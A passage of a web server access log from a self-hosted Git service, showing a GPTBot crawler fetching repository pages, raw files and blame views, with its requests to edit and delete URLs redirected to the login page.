"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11086] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12855] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12856] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 27456] [Gzip 7.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:17:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 74.7.227.38] [Length 11549] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:17:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11549] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:17:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13021] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 888] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:05:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:05:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:05:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:05:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 888] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 14090] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15814] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:17:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14898] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components" +[17/Feb/2026:17:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11981] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" +[17/Feb/2026:17:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12832] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" +[17/Feb/2026:17:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog?display=rendered" [Client 74.7.227.38] [Length 84467] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:17:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12816] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:17:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog?display=rendered" [Client 74.7.227.38] [Length 84431] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" +[17/Feb/2026:17:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12311] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" +[17/Feb/2026:17:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:05:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:05:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/About.tsx" +[17/Feb/2026:17:05:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 16209] [Gzip 7.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14845] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14491] 